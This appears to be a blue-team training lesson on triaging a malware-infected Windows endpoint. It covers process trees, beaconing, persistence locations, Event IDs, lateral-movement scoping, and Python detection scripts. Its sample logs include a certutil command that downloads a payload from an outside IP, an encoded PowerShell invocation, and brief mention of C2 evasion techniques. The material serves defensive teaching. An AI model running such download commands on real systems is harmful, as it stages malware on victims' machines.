Blue Team · Easy
Malware Endpoint Triage

Master the IR02 endpoint investigation workflow — reading process trees to identify malicious execution chains, recognising C2 beaconing patterns, cataloguing every persistence mechanism, correlating Windows Event IDs into a coherent attack timeline, and making the containment vs investigate decision under time pressure.

Easy Blue Team Path ⏱ 22 min read

Endpoint Malware Triage

When an EDR tool or antivirus flags a suspicious process, the SOC analyst must investigate quickly. The goal is to determine what the malware is doing, whether it has achieved persistence, what data may have been accessed, and whether other systems are affected. This is the IR02 playbook — the foundational endpoint investigation workflow every analyst must internalise before moving to more complex incident types.

⚠️Containment first: If the system is actively spreading or exfiltrating data, isolate it from the network before investigating. Evidence collection comes after containment — a live system exfiltrating data causes ongoing harm, whereas a contained system with slightly degraded forensic state is recoverable.

The Containment Decision

One of the first and most consequential decisions in endpoint malware response is whether to isolate the system immediately or investigate it live first. Both approaches have trade-offs that depend on the specific situation:

Isolate Immediately When...

- Active lateral movement confirmed (Event 4624 Type 3 from this host to others).
- Active data exfiltration in progress (large outbound transfers).
- Ransomware behaviour detected (mass file encryption, shadow copy deletion).
- The malware family is known to propagate aggressively.

Investigate Live First When...

- No active lateral movement or exfiltration confirmed.
- The malware appears to be beaconing but dormant.
- You need volatile memory state (active network connections, injected process memory) that will be lost on isolation.
- The system is a honeypot or lower-value asset where observing attacker behaviour is useful.

📌 Non-Technical Analogy — Process Trees

A process tree is like a corporate org chart showing who hired whom. In a legitimate company, people are hired through normal channels with expected reporting lines. When you see the CEO's Office directly spawning a maintenance worker who then spawns an anonymous contractor who reports to an external consultant — the reporting structure itself tells you something is wrong. Word processors spawn Word processes. Word processes do not spawn command shells. Command shells do not spawn PowerShell with encoded payloads. When you see those parent-child relationships in a process tree, you are reading the malware's org chart — and it reveals exactly who gave the order and in what sequence.

Endpoint Investigation Checklist

Structured Triage Order — Six Investigation Axes
Processes    Who spawned what? Unusual parent-child relationships? Masquerading names?
Network      Connections to unknown IPs? Regular beaconing intervals? DNS anomalies?
Files        Newly created or modified files in unusual paths? Dropped payloads?
Registry     New Run keys? Scheduled tasks? New services? Boot-time persistence?
Users        New accounts created? Privilege changes? Unusual logon events?
Logs         Event 4688 (process) 4624 (logon) 4625 (fail) 7045 (service) 4698 (task)

Malware Investigation in Practice

Example 01: Suspicious process tree

Malware often spawns from unusual parents. Word spawning PowerShell is a classic macro-based execution red flag — this parent-child relationship should never occur in normal operation.

winword.exe (PID 4521)
  cmd.exe (PID 4892)
    powershell.exe -enc JABzAD0ATgBlAHcA... (base64-encoded payload)
      svchost32.exe (fake svchost -- legitimate svchost never has "32" suffix)
# Word macro fired cmd, ran encoded PowerShell, dropped fake svchost
# Classic macro-based malware execution chain

Example 02: C2 beaconing pattern

Regular outbound connections at fixed intervals indicate Command and Control — malware phoning home on a schedule. The machine-like regularity is the distinguishing characteristic from human browsing behaviour.

14:00:03  10.0.1.55  185.220.101.45:443
14:05:03  10.0.1.55  185.220.101.45:443
14:10:03  10.0.1.55  185.220.101.45:443
14:15:03  10.0.1.55  185.220.101.45:443
# Exactly every 5 minutes = automated C2 beaconing
# 185.220.101.45 = known Tor exit node / C2 infrastructure
# Small, regular HTTPS connections at fixed intervals = jitter-free beacon

Example 03: Registry persistence

Malware writes Run keys and scheduled tasks to survive reboots. Every persistence location must be checked — malware commonly establishes multiple mechanisms in case one is removed.

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
WindowsUpdate  REG_SZ  C:\Users\bob\AppData\Roaming\svchost32.exe

schtasks /query /fo LIST /v | findstr /C:"TaskName" /C:"Task To Run"
TaskName:     \MicrosoftUpdateHelper
Task To Run:  C:\ProgramData\update.exe
# Two persistence mechanisms found (Run key + scheduled task)
# Both point to files in non-standard locations for Windows updates

Example 04: Key Windows Event IDs

Windows Event Logs tell the forensic story of what happened on the endpoint. These four events together reconstruct the complete compromise chain.

# Process creation (Event 4688):
Process: C:\Users\bob\AppData\Roaming\svchost32.exe
Parent:  cmd.exe

# New service (Event 7045) -- persistence via service:
Service: WindowsUpdateSvc32
Binary:  C:\ProgramData\update.exe

# Lateral movement detected (Event 4624 Type 3 logged on this host, source is the remote machine):
Account: Administrator  Source IP: 10.0.1.88 → 10.0.1.55
# 10.0.1.88 already has a foothold -- spreading to this endpoint

What You Need to Know

🌳
Process Tree
Parent-child relationships reveal execution chains. Word spawning PowerShell, explorer spawning cmd, or Office spawning wscript are classic malware execution patterns — these relationships should never occur in normal operation.
📡
C2 Beaconing
Regular outbound connections at fixed intervals indicate Command and Control. The regularity is the giveaway — humans do not make network connections on machine-precise schedules.
🔄
Persistence
Registry Run keys, scheduled tasks, services, startup folders. Malware always establishes persistence to survive reboots — check all locations, as multiple mechanisms are common.
📊
Key Event IDs
4688 process creation, 4624/4625 logon success/fail, 7045 new service, 4698 scheduled task created. Together these tell the complete forensic story of how the endpoint was compromised.

Process Masquerading and Name-Based Evasion

Malware authors know that analysts hunt suspicious process names, so they mimic legitimate Windows process names to blend into the process list. Understanding the specific masquerading patterns — and how to spot them — is one of the most practically valuable endpoint triage skills.

Example 05: LOLBAS abuse and process masquerading detection

Detecting malware that uses legitimate Windows binaries and name-based evasion — two of the most common techniques for evading signature-based detection.

--- LOLBAS: certutil used as downloader ---
Event 4688 -- Process Creation
Parent: cmd.exe  Process: certutil.exe
CommandLine: certutil -urlcache -split -f http://185.220.101.45/payload.exe C:\ProgramData\update.exe
# certutil is a legitimate Windows certificate utility
# -urlcache -split -f = download from URL (documented LOLBAS technique)
# Certutil downloading executables from external IPs = malware staging

--- Process masquerading: wrong parent for svchost ---
Event 4688 -- Process Creation
Process: C:\Windows\System32\svchost.exe (correct path)
Parent:  powershell.exe (WRONG -- svchost parent should be services.exe only)
# Parent process mismatch = injection or hollowing into svchost
# Malware created svchost from PowerShell to blend into process list
# Check memory of this svchost instance for injected code
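The checks behind Example 01 (Office-to-shell chains, encoded PowerShell, look-alike names) and Example 05 (certutil as a downloader, svchost with the wrong parent) can be expressed as rules over Event 4688 data. The following Python is an added example, not part of this lesson or of any EDR product: the process records are constructed (the paths and the IP are the ones already used above), and the allowlists OFFICE, SHELLS, SYSTEM32_ONLY and EXPECTED_PARENT are this example's own assumptions rather than an exhaustive baseline.

```python
import re
from collections import defaultdict

# Constructed Event 4688-style records for one host: (pid, parent pid, image, command line).
# Values are invented for illustration apart from the paths and IP used in this lesson.
EVENTS = [
    (500,  4,    r"C:\Windows\System32\wininit.exe", "wininit.exe"),
    (600,  500,  r"C:\Windows\System32\services.exe", "services.exe"),
    (800,  600,  r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
    (1200, 800,  r"C:\Windows\explorer.exe", "explorer.exe"),
    (4521, 1200, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "WINWORD.EXE /n invoice.docm"),
    (4892, 4521, r"C:\Windows\System32\cmd.exe", "cmd.exe /c powershell -enc JABzAD0ATgBlAHcA..."),
    (4900, 4892, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell -enc JABzAD0ATgBlAHcA..."),
    (4955, 4900, r"C:\Users\bob\AppData\Roaming\svchost32.exe", "svchost32.exe"),
    (5010, 4892, r"C:\Windows\System32\certutil.exe",
     "certutil -urlcache -split -f http://185.220.101.45/payload.exe C:\\ProgramData\\update.exe"),
    (5100, 4900, r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
]

# Assumed rule tables (this example's own, not a complete baseline).
OFFICE = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
SYSTEM32_ONLY = {"svchost.exe", "lsass.exe", "csrss.exe", "services.exe", "wininit.exe"}
EXPECTED_PARENT = {"svchost.exe": "services.exe", "lsass.exe": "wininit.exe", "services.exe": "wininit.exe"}
LOOKALIKE = re.compile(r"^(svchost|lsass|csrss|explorer|winlogon)\d+\.exe$")
# Common spellings of PowerShell's -EncodedCommand switch (-e, -ec, -enc, full name).
ENCODED = re.compile(r"\s-e(c|nc|ncodedcommand)?\b")

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def build_tree(events):
    """Index processes by pid so parent links can be walked."""
    return {pid: {"ppid": ppid, "image": image, "cmd": cmd} for pid, ppid, image, cmd in events}

def ancestry(tree, pid):
    """Names of all ancestors, nearest parent first; stops at an unknown pid or a cycle."""
    names, seen, ppid = [], set(), tree[pid]["ppid"]
    while ppid in tree and ppid not in seen:
        seen.add(ppid)
        names.append(basename(tree[ppid]["image"]))
        ppid = tree[ppid]["ppid"]
    return names

def triage(events):
    """Return {pid: [finding, ...]} for every process that trips at least one rule."""
    tree, findings = build_tree(events), defaultdict(list)
    for pid, proc in tree.items():
        name, cmd, anc = basename(proc["image"]), proc["cmd"].lower(), ancestry(tree, pid)
        parent = anc[0] if anc else None
        if name in SHELLS and any(a in OFFICE for a in anc):
            findings[pid].append("office-to-shell chain: " + " > ".join(reversed(anc)) + f" > {name}")
        if name == "powershell.exe" and ENCODED.search(cmd):
            findings[pid].append("encoded PowerShell command line")
        if name == "certutil.exe" and "-urlcache" in cmd:
            findings[pid].append("LOLBAS: certutil used as downloader")
        if LOOKALIKE.match(name):
            findings[pid].append(f"masquerading: look-alike name {name}")
        if name in SYSTEM32_ONLY and not proc["image"].lower().startswith("c:\\windows\\system32\\"):
            findings[pid].append(f"masquerading: {name} outside System32 ({proc['image']})")
        if name in EXPECTED_PARENT and parent is not None and parent != EXPECTED_PARENT[name]:
            findings[pid].append(f"wrong parent: {name} started by {parent}, expected {EXPECTED_PARENT[name]}")
    return dict(findings)

if __name__ == "__main__":
    for pid, hits in sorted(triage(EVENTS).items()):
        print(pid, *hits, sep="\n    ")
```

Walking the full ancestry rather than only the direct parent is what catches the chain in Example 01: powershell.exe's parent is cmd.exe, which looks ordinary on its own, but winword.exe two levels up is the signal. One caveat worth keeping in mind when tuning such rules: explorer.exe starting cmd.exe is also how a user opens a prompt interactively, so that pair carries far more weight together with the command line and the user context than as a bare parent-child rule.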

Persistence Mechanism Catalogue — Every Location to Check

Persistence is the ability for malware to survive a reboot. Checking every persistence location is non-negotiable in endpoint triage — a thorough eradication that misses one persistence mechanism results in re-infection the next time the system restarts. The following table covers all standard Windows persistence locations.

Mechanism: Run key (current user)
  Location / Command: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  Detection Note: Executes for the logged-in user on login. Common malware location — check against known-good baseline.

Mechanism: Run key (all users)
  Location / Command: HKLM\Software\Microsoft\Windows\CurrentVersion\Run
  Detection Note: Executes for all users. Requires admin to write. Higher privilege = more impactful persistence.

Mechanism: Scheduled task
  Location / Command: schtasks /query /fo LIST /v
  Detection Note: Event 4698 on creation. Check Task To Run path — malware in AppData or ProgramData is suspicious.

Mechanism: New service
  Location / Command: sc query type= all state= all
  Detection Note: Event 7045 on installation. Service binary path should be in System32 or Program Files — not AppData.

Mechanism: Startup folder (user)
  Location / Command: %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
  Detection Note: Any file here executes on user login. Often overlooked in quick triage.

Mechanism: Startup folder (all users)
  Location / Command: %PROGRAMDATA%\Microsoft\Windows\Start Menu\Programs\Startup
  Detection Note: Requires admin rights to place files here.

Mechanism: WMI subscription
  Location / Command: Get-WMIObject -Namespace root\subscription -Class __EventFilter
  Detection Note: Fileless persistence — survives AV scans as it lives in WMI database, not on disk.

Mechanism: Registry RunOnce
  Location / Command: HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
  Detection Note: Single execution on next boot then deletes itself. Used for staged malware deployment.
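Once the locations above (and those in Example 03) have been enumerated, the remaining work is judging each entry. The Python below is an added example, not part of the lesson: it takes a constructed inventory of persistence entries (mechanism, name, target path), skips anything matching a known-good baseline, and reports the reasons an entry looks wrong. The regular expressions, the BASELINE set and the entry names other than those already in this lesson are this example's own assumptions.

```python
import re

# Constructed persistence inventory: (mechanism, entry name, target path).
# WindowsUpdate / svchost32.exe, MicrosoftUpdateHelper, WindowsUpdateSvc32 and
# update.exe come from this lesson; the remaining entries are invented.
INVENTORY = [
    ("Run key (HKCU)", "WindowsUpdate", r"C:\Users\bob\AppData\Roaming\svchost32.exe"),
    ("Run key (HKLM)", "SecurityHealth", r"C:\Windows\System32\SecurityHealthSystray.exe"),
    ("Scheduled task", "MicrosoftUpdateHelper", r"C:\ProgramData\update.exe"),
    ("Scheduled task", "OneDrive Standalone Update Task",
     r"C:\Users\bob\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe"),
    ("Service", "WindowsUpdateSvc32", r"C:\ProgramData\update.exe"),
    ("Service", "Spooler", r"C:\Windows\System32\spoolsv.exe"),
    ("Startup folder (user)", "report.lnk", r"C:\Users\bob\AppData\Local\Temp\report.vbs"),
    ("WMI subscription", "UpdaterConsumer", r"C:\ProgramData\update.exe"),
]

# Known-good baseline for this host image (assumed): (mechanism, name, lowercase path).
# A legitimate updater living in AppData is only acceptable because it is baselined.
BASELINE = {
    ("Run key (HKLM)", "SecurityHealth", r"c:\windows\system32\securityhealthsystray.exe"),
    ("Scheduled task", "OneDrive Standalone Update Task",
     r"c:\users\bob\appdata\local\microsoft\onedrive\onedrivestandaloneupdater.exe"),
    ("Service", "Spooler", r"c:\windows\system32\spoolsv.exe"),
}

SUSPICIOUS_DIRS = re.compile(r"\\(appdata|programdata|temp|users\\public|downloads)\\", re.I)
SCRIPT_HOSTS = re.compile(r"\.(vbs|js|jse|hta|ps1|bat|cmd)$|\\(wscript|cscript|mshta|regsvr32|rundll32)\.exe\b", re.I)
UPDATE_THEME = re.compile(r"(windows|microsoft|update|svc|helper)", re.I)
TRAILING_DIGITS = re.compile(r"\D\d{1,3}(\.exe)?$", re.I)

def assess(mechanism, name, path):
    """Return the list of reasons an entry deserves a closer look (empty = nothing found)."""
    if (mechanism, name, path.lower()) in BASELINE:
        return []
    reasons = []
    if SUSPICIOUS_DIRS.search(path):
        reasons.append("binary in user-writable / non-standard location")
    if SCRIPT_HOSTS.search(path):
        reasons.append("script or LOLBAS loader as persistence target")
    if UPDATE_THEME.search(name) and (SUSPICIOUS_DIRS.search(path) or TRAILING_DIGITS.search(name)):
        reasons.append("Windows/update-themed name not backed by a Windows path")
    if TRAILING_DIGITS.search(path.rsplit("\\", 1)[-1]):
        reasons.append("numeric suffix on binary name (look-alike)")
    if mechanism == "WMI subscription":
        reasons.append("WMI consumer not in baseline (fileless persistence candidate)")
    return reasons

def review(inventory):
    """Map (mechanism, name) to its reasons for every entry that is not clean."""
    findings = {}
    for mechanism, name, path in inventory:
        reasons = assess(mechanism, name, path)
        if reasons:
            findings[(mechanism, name)] = reasons
    return findings

if __name__ == "__main__":
    for (mechanism, name), reasons in review(INVENTORY).items():
        print(f"{mechanism:24} {name:32} {'; '.join(reasons)}")
```

The baseline is doing real work here: the OneDrive task points into AppData\Local exactly like the malicious Run key does, and only the known-good match separates the two. Without a baseline the location rule alone produces noise, which is why the catalogue's note on Run keys says to compare against known-good rather than to flag every user-profile path.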

C2 Beaconing — Detection and Hunting

C2 (Command and Control) beaconing is the channel through which malware receives instructions from the attacker and exfiltrates data. Recognising beaconing patterns in network logs is a core threat hunting skill — the regularity that makes beaconing so operationally useful for attackers is also what makes it detectable.

Jitter and Evasion

Sophisticated malware adds "jitter" — randomness in the beacon interval — to make exact-interval detection harder. Instead of connecting every 300 seconds exactly, it might connect every 280–320 seconds. Detection shifts from looking for exact intervals to looking for statistical regularity in connection timing. A host that makes HTTPS connections to the same external IP between every 250–350 seconds for 12 hours is beaconing, even without exact regularity.

Other C2 evasion techniques include: domain fronting (using legitimate CDN domains like Cloudflare or Fastly to proxy C2 traffic, making the destination appear legitimate), DNS beaconing (encoding C2 communication in DNS queries to avoid HTTPS inspection), and sleeping for extended periods to reduce alert frequency.

Example 06: C2 traffic analysis and lateral movement confirmation

Combining network flow analysis with endpoint process data to confirm C2 and scope lateral movement from a single compromised host.

--- C2 beacon analysis (network flow logs) ---
14:00:03  10.0.1.55 → 185.220.101.45:443  HTTPS  847 bytes outbound
14:05:03  10.0.1.55 → 185.220.101.45:443  HTTPS  847 bytes outbound
14:10:03  10.0.1.55 → 185.220.101.45:443  HTTPS  847 bytes outbound
# Identical byte count + identical interval = automated beaconing
# 847 bytes = small "check-in" packet (no large data returned = awaiting commands)

--- Lateral movement from the beaconing host (Event 4624) ---
14:32:11  Event 4624 Type 3 (Network)  NTLM auth
Source:    10.0.1.55 (compromised host)  → 10.0.1.88 (fileserver)
Account:   CORP\Administrator
# Compromised host pivoting to fileserver using stolen admin credentials
# Check 10.0.1.88 for same C2 beacon pattern -- likely already infected

--- Exfiltration detection (flow volume anomaly) ---
14:45:03  10.0.1.55 → 185.220.101.45:443  HTTPS  2.3 GB outbound in 18 minutes
# Volume spike from 847-byte beacons to 2.3 GB = data exfiltration phase
# C2 issued exfiltration command after lateral movement completed
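Example 02, the jitter discussion and the beacon and exfiltration parts of Example 06 all reduce to statistics over flow records. The Python below is an added example, not part of the lesson: it generates a constructed set of flows (the lesson's 5-minute cadence and 847-byte check-ins, but with random jitter of up to 20 seconds, plus a single large upload standing in for the exfiltration phase, plus irregular browsing to a documentation-range address), then scores each source/destination pair on timing regularity and size uniformity and reports volume spikes. The thresholds (coefficient of variation 0.15, 80 % size uniformity, 100x spike factor) are this example's assumptions, not published tuning values.

```python
import random
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, pstdev

def make_flows():
    """Constructed flow records (timestamp, src, dst, port, bytes_out).
    The beacon keeps the lesson's 5-minute cadence with +/-20 s of jitter and
    ends with a 2.3 GB upload; 198.51.100.10 (documentation range) plays the
    part of ordinary browsing with irregular timing and sizes."""
    random.seed(7)
    t0 = datetime(2024, 1, 1, 14, 0, 3)
    flows, t = [], t0
    for _ in range(40):
        flows.append((t, "10.0.1.55", "185.220.101.45", 443, 847))
        t += timedelta(seconds=300 + random.randint(-20, 20))
    flows.append((t, "10.0.1.55", "185.220.101.45", 443, 2_300_000_000))
    for _ in range(15):
        browse_at = t0 + timedelta(seconds=random.randint(0, 12000))
        flows.append((browse_at, "10.0.1.55", "198.51.100.10", 443, random.randint(400, 60_000)))
    return sorted(flows)

def analyse(flows, min_count=10, max_cv=0.15, min_uniformity=0.8, spike_factor=100):
    """Score every (src, dst, port) pair for beacon-like behaviour.

    gap_cv is stdev/mean of the gaps between consecutive connections: ~0 for a
    jitter-free beacon, small for a jittered one, around 1 or more for browsing.
    size_uniformity is the share of flows whose byte count equals the median,
    high for a fixed-size check-in. Flows far above the typical size are listed
    as volume spikes so the exfiltration phase is visible even on a beaconing pair."""
    groups = defaultdict(list)
    for ts, src, dst, port, nbytes in sorted(flows):
        groups[(src, dst, port)].append((ts, nbytes))
    report = {}
    for key, recs in groups.items():
        if len(recs) < min_count:
            continue
        times = [ts for ts, _ in recs]
        sizes = [b for _, b in recs]
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg else float("inf")
        typical = sorted(sizes)[len(sizes) // 2]
        uniformity = sizes.count(typical) / len(sizes)
        report[key] = {
            "count": len(recs),
            "mean_gap_s": round(avg, 1),
            "gap_cv": round(cv, 3),
            "size_uniformity": round(uniformity, 2),
            "beaconing": cv <= max_cv and uniformity >= min_uniformity,
            "volume_spikes": [(ts, b) for ts, b in recs if b > spike_factor * typical],
        }
    return report

def beaconing_pairs(report):
    """The (src, dst, port) tuples that met the beacon criteria."""
    return sorted(k for k, v in report.items() if v["beaconing"])

if __name__ == "__main__":
    rep = analyse(make_flows())
    for key, stats in rep.items():
        print(key, stats)
    print("beaconing:", beaconing_pairs(rep))
```

Scoring on the coefficient of variation rather than on an exact interval is what makes the jittered beacon still stand out: 20 seconds of jitter on a 300-second period gives a gap_cv of a few hundredths, far below what interactive traffic produces. Domain fronting and DNS beaconing defeat the destination-IP grouping used here, which is why the same statistics are worth running per SNI or per queried domain as well.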

Building the Forensic Timeline and Scoping Lateral Movement

An endpoint triage investigation produces two critical outputs: a forensic timeline of what happened on the compromised host, and a lateral movement scope — which other systems the attacker has touched or compromised. Both are required before eradication can begin; eradicating one host while the attacker has persisted on three others accomplishes nothing.

IR Scenario: Word Macro to Domain Compromise — A Complete Endpoint IR Chain

Initial alert: EDR fires "Malicious macro execution detected" on CORP-PC-055 (Bob Chen, Finance). Analyst opens the case and begins structured triage.

Process tree: winword.exe → cmd.exe → powershell.exe -enc [base64] → svchost32.exe (AppData path). The encoded PowerShell is decoded: it downloads a second-stage payload from 185.220.101.45 using certutil, then executes it.

Persistence: Run key WindowsUpdate pointing to svchost32.exe. Scheduled task MicrosoftUpdateHelper pointing to C:\ProgramData\update.exe. Two mechanisms confirmed.

C2: Network logs show svchost32.exe connecting to 185.220.101.45:443 every 5 minutes since 09:31. First beacon 8 minutes after macro execution. Session has been active for 4 hours.

Lateral movement: Event 4624 Type 3 from CORP-PC-055 to CORP-SRV-FILE01 at 11:42, using CORP\Administrator credentials harvested by the malware from LSASS memory. CORP-SRV-FILE01 shows identical C2 beacon pattern beginning at 11:47. Second host confirmed compromised.

Containment: Both hosts isolated via EDR network quarantine. Administrator password reset forced. Scope check: no other hosts show connections to 185.220.101.45. LSASS dump check on CORP-SRV-FILE01 shows additional credentials harvested — domain-wide password audit initiated.
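The two outputs named at the start of this section, the timeline and the lateral movement scope, can be produced mechanically from the Event IDs in Example 04 once logs from several hosts are in one place. The Python below is an added example, not part of the lesson: it takes constructed event extracts that follow the scenario above (CORP-PC-055, CORP-SRV-FILE01, the C2 address and the 11:42 logon are the lesson's; CORP-PC-061, CORP-SRV-DB01, the other timestamps and the record contents are invented), expands the compromised-host set from patient zero, and lists the accounts that need rotating. Note that 4624 records are placed on the destination host with a source field, which is where Windows actually logs a network logon.

```python
# Constructed event extracts: (time "HH:MM:SS", host the event was logged on, event id, fields).
# Event ids are ints for Windows events and the string "flow" for network flow records.
EVENTS = [
    ("09:23:10", "CORP-PC-055", 4688, {"process": "powershell.exe", "parent": "cmd.exe", "cmdline": "powershell -enc ..."}),
    ("09:24:40", "CORP-PC-055", 4688, {"process": "certutil.exe", "parent": "cmd.exe", "cmdline": "certutil -urlcache ..."}),
    ("09:25:02", "CORP-PC-055", 4698, {"task": "MicrosoftUpdateHelper", "action": r"C:\ProgramData\update.exe"}),
    ("09:31:00", "CORP-PC-055", "flow", {"dst": "185.220.101.45", "port": 443, "bytes": 847}),
    ("10:15:00", "CORP-SRV-FILE01", 4624, {"type": 3, "account": "CORP\\alice", "source": "CORP-PC-061", "auth": "Kerberos"}),
    ("11:42:07", "CORP-SRV-FILE01", 4624, {"type": 3, "account": "CORP\\Administrator", "source": "CORP-PC-055", "auth": "NTLM"}),
    ("11:45:30", "CORP-SRV-FILE01", 7045, {"service": "WindowsUpdateSvc32", "binary": r"C:\ProgramData\update.exe"}),
    ("11:47:00", "CORP-SRV-FILE01", "flow", {"dst": "185.220.101.45", "port": 443, "bytes": 847}),
    ("11:52:15", "CORP-SRV-DB01", 4624, {"type": 3, "account": "CORP\\Administrator", "source": "CORP-SRV-FILE01", "auth": "NTLM"}),
    ("12:00:00", "CORP-SRV-DB01", "flow", {"dst": "203.0.113.9", "port": 443, "bytes": 1200}),
]

def by_time(events):
    # Sort on the timestamp only: event ids mix ints and strings and must not be compared.
    return sorted(events, key=lambda e: e[0])

def scope(events, patient_zero, first_seen, c2_ips):
    """Expand the compromised-host set from patient zero until nothing changes.

    Two rules add a host: (1) a Type 3 logon onto it from a host already in the
    set, at or after that host's own compromise time; (2) a flow from it to a
    known C2 address. Extra matches on an already-listed host are kept as
    corroborating evidence, which is what the scenario's second beacon is."""
    comp = {patient_zero: {"first": first_seen, "evidence": ["EDR alert (patient zero)"]}}
    changed = True
    while changed:
        changed = False
        for t, host, eid, d in by_time(events):
            why = None
            if eid == "flow" and d["dst"] in c2_ips:
                why = f"{t} beacon to {d['dst']}:{d['port']}"
            elif eid == 4624 and d["type"] == 3 and d["source"] in comp and t >= comp[d["source"]]["first"]:
                why = f"{t} Type 3 logon from {d['source']} as {d['account']} ({d['auth']})"
            if why is None:
                continue
            if host not in comp:
                comp[host] = {"first": t, "evidence": [why]}
                changed = True
            elif why not in comp[host]["evidence"]:
                comp[host]["evidence"].append(why)
    return comp

def accounts_to_rotate(events, comp):
    """Accounts that logged on to a compromised host at or after its compromise time."""
    return {d["account"] for t, host, eid, d in events
            if eid == 4624 and host in comp and t >= comp[host]["first"]}

def timeline(events, hosts):
    """Chronological rows (time, host, event id, fields) for the hosts in scope."""
    return [(t, host, str(eid), ", ".join(f"{k}={v}" for k, v in d.items()))
            for t, host, eid, d in by_time(events) if host in hosts]

if __name__ == "__main__":
    comp = scope(EVENTS, "CORP-PC-055", "09:23:10", {"185.220.101.45"})
    for host, info in comp.items():
        print(host, info["first"], *info["evidence"], sep="\n    ")
    print("rotate:", sorted(accounts_to_rotate(EVENTS, comp)))
    for row in timeline(EVENTS, set(comp)):
        print(*row)
```

The time guard on rule (1) matters: alice's Kerberos logon to the file server at 10:15 comes from a host that is never compromised, and even a logon from CORP-PC-055 before 09:23 would not count. Iterating until the set stops growing is what reaches the third host, which only becomes reachable once the file server is known to be compromised. The alert that opened the case is only recorded as evidence for patient zero; every other host in the result carries the specific logon or beacon that put it there, which is the record the eradication checklist asks for.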

Eradication Checklist: Before clearing any compromised endpoint, confirm: (1) all persistence mechanisms identified and noted, (2) all C2 IOCs extracted and blocked at the firewall/proxy, (3) all credentials present on the system during infection are treated as compromised and rotated, (4) all other systems the malware may have pivoted to have been investigated. Rebuilding the endpoint from a clean image rather than attempting manual cleanup is the recommended approach for any confirmed malware infection — manual cleanup invariably misses something.

Core Concepts Summary

🌳
Process Tree
Word/Excel/Outlook spawning cmd/PowerShell/wscript = macro execution. cmd spawning PowerShell with -enc = encoded payload. Verify parent, full path, and command line for every suspicious process.
📡
C2 Beaconing
Fixed interval + small byte count + external IP = C2 check-in. Jitter (variable interval) requires statistical analysis. Identical byte counts across all connections = automated, not human. Volume spike = exfiltration phase.
🔄
Persistence Catalogue
Run keys (HKCU + HKLM), scheduled tasks (Event 4698), services (Event 7045), startup folders, WMI subscriptions. Check all — malware commonly installs multiple mechanisms. Verify binary paths against known-good locations.
📊
Key Event IDs
4688 process creation (with command line), 4624 Type 3 lateral movement, 4625 failed auth (spray/brute), 7045 new service, 4698 scheduled task, 4663 file access. Together these reconstruct the full attack chain.
🎭
Process Masquerading
Numeric suffixes (svchost32), wrong parent (svchost from PowerShell), wrong path (System32 process in AppData), LOLBAS (certutil as downloader, mshta/regsvr32 as loaders). Name alone is insufficient — verify path + parent + args.
🔀
Lateral Movement
Event 4624 Type 3 (network logon) from compromised host to other hosts. NTLM auth from workstation to server = suspicious. Check destination hosts for same C2 indicators. Scope before eradicating — one host is rarely the only infected system.
Containment Decision
Active spreading or exfiltration → isolate immediately. Dormant beacon → investigate live first for volatile state. Network quarantine via EDR preserves the system for investigation while stopping propagation. Always document the decision and reasoning.
🏗️
Eradication Standard
Rebuild from clean image — manual cleanup misses persistence. Rotate all credentials present during infection. Block C2 IOCs at perimeter. Scope lateral movement before declaring eradication complete. Post-incident: close the initial access vector.